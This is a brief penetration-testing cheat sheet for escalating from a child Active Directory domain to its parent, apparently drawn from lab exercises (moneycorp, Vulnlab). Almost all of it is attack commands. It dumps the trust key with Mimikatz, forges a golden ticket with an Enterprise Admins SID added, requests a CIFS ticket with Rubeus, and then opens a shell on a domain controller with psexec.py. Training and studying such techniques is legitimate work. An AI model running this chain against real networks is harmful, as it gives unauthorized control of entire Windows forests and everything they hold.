Child-to-Parent CIFS
For long version refer this article Refer Trusted- Vulnlab for example To get Domain SID:
lsadump::trust /patchThen
Use the SID and rc4 hash:
Kerberos::golden
/user: Administrator
/domain: dollarcorp.moneycorp.local [child_domain]
/sid: DomainAdmin_SID [-512]
/sids: Enterprise_Admin_SID [519]
/rc4: Ticket HASH
/service:krbtgt
/target:moneycorp.local [root domain]
/ticket: location to save the ticketNow use Rubeus to get TGS:
Rubeus.exe asktgs
/ticket: ticket Location
/service: service type [cifs/mcorpdc.moneycorp.local]
/dc: domain controller [mcorp-dc.moneycorp.local]
/pttThen to get shell:
psexec.py administrator@trusteddc.trusted.vl -k -no-passLast updated
Was this helpful?